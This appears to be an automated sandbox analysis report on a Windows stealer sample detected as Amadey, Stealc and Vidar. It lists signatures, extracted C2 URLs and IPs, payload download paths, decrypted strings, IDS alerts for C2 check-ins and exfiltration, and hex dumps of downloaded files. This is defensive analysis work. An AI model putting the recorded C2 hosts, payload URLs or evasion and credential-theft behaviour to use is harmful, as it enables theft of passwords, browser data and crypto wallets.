Windows Analysis Report
Rnteb46TuM.exe

Overview

General Information

Sample name: Rnteb46TuM.exe
renamed because original name is a hash value
Original sample name: 9c1c20db1d73c66795b9b49f39aff02d621dd06c05d7d3ea1007ac7bcbf3f3cd.exe
Analysis ID: 1465032
MD5: b3badd1cd2cba4f587bd6737d34d3569
SHA1: bc229f10399c3482df1faa98bf7074a4440e82a5
SHA256: 9c1c20db1d73c66795b9b49f39aff02d621dd06c05d7d3ea1007ac7bcbf3f3cd

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: Rnteb46TuM.exe Avira: detected
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllm Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/nss3.dllBn Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dllb Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dllV Avira URL Cloud: Label: malware
Source: http://85.28.47.4/y Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exeurlencoded Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe5067 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpZ Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllh Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phps Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpu Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exeFr Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/6 Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exeX Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exeS Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpft Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeAppData Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 12.2.6e6e496542.exe.410000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.7104.10.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 27% Perma Link
Source: http://85.28.47.4/ Virustotal: Detection: 16% Perma Link
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 27% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php Virustotal: Detection: 24% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dllV Virustotal: Detection: 17% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php- Virustotal: Detection: 21% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Virustotal: Detection: 6% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpV Virustotal: Detection: 22% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Virustotal: Detection: 7% Perma Link
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Virustotal: Detection: 25% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php= Virustotal: Detection: 21% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Virustotal: Detection: 9% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php5 Virustotal: Detection: 21% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Virustotal: Detection: 7% Perma Link
Source: http://77.91.77.82/ Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.81/mine/amadka.exe00 Virustotal: Detection: 25% Perma Link
Source: http://77.91.77.81/stealc/random.exeurlencoded Virustotal: Detection: 24% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Virustotal: Detection: 6% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.81/stealc/random.exe Virustotal: Detection: 27% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Virustotal: Detection: 23% Perma Link
Source: Rnteb46TuM.exe Virustotal: Detection: 82% Perma Link
Source: Rnteb46TuM.exe ReversingLabs: Detection: 91%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Joe Sandbox ML: detected
Source: Rnteb46TuM.exe Joe Sandbox ML: detected
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetProcAddress
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: LoadLibraryA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: lstrcatA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: OpenEventA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CreateEventA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CloseHandle
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: Sleep
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetUserDefaultLangID
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: VirtualAllocExNuma
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: VirtualFree
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetSystemInfo
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: VirtualAlloc
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: HeapAlloc
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetComputerNameA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: lstrcpyA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetProcessHeap
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetCurrentProcess
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: lstrlenA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: ExitProcess
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetSystemTime
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: SystemTimeToFileTime
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: advapi32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: gdi32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: user32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: crypt32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: ntdll.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetUserNameA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CreateDCA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetDeviceCaps
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: ReleaseDC
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CryptStringToBinaryA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: sscanf
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: VMwareVMware
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: HAL9TH
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: JohnDoe
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: DISPLAY
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: %hu/%hu/%hu
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: http://85.28.47.4
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: /920475a59bac849d.php
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: /69934896f997d5bb/
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: default
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetFileAttributesA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GlobalLock
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: HeapFree
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetFileSize
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GlobalSize
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: IsWow64Process
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: Process32Next
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetLocalTime
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: FreeLibrary
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetTimeZoneInformation
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetSystemPowerStatus
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetVolumeInformationA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: Process32First
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetLocaleInfoA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetModuleFileNameA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: DeleteFileA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: FindNextFileA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: LocalFree
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: FindClose
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: LocalAlloc
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetFileSizeEx
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: ReadFile
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: SetFilePointer
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: WriteFile
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CreateFileA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: FindFirstFileA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CopyFileA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: VirtualProtect
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetLastError
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: lstrcpynA
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: MultiByteToWideChar
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GlobalFree
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: WideCharToMultiByte
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GlobalAlloc
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: OpenProcess
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: TerminateProcess
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: GetCurrentProcessId
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: gdiplus.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: ole32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: bcrypt.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: wininet.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: shlwapi.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: shell32.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: psapi.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: rstrtmgr.dll
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: SelectObject
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: BitBlt
Source: 12.2.6e6e496542.exe.410000.0.unpack String decryptor: DeleteObject
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C7A6C80
Source: Rnteb46TuM.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: Rnteb46TuM.exe, 00000000.00000002.2331152818.000000006C80D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Rnteb46TuM.exe, 00000000.00000002.2331152818.000000006C80D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking

Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49711 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49711 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.6:49711
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49711 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.6:49711
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:49725 -> 77.91.77.82:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 77.91.77.82:80 -> 192.168.2.6:49725
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.6:49728 -> 77.91.77.82:80
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49729 -> 85.28.47.4:80
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 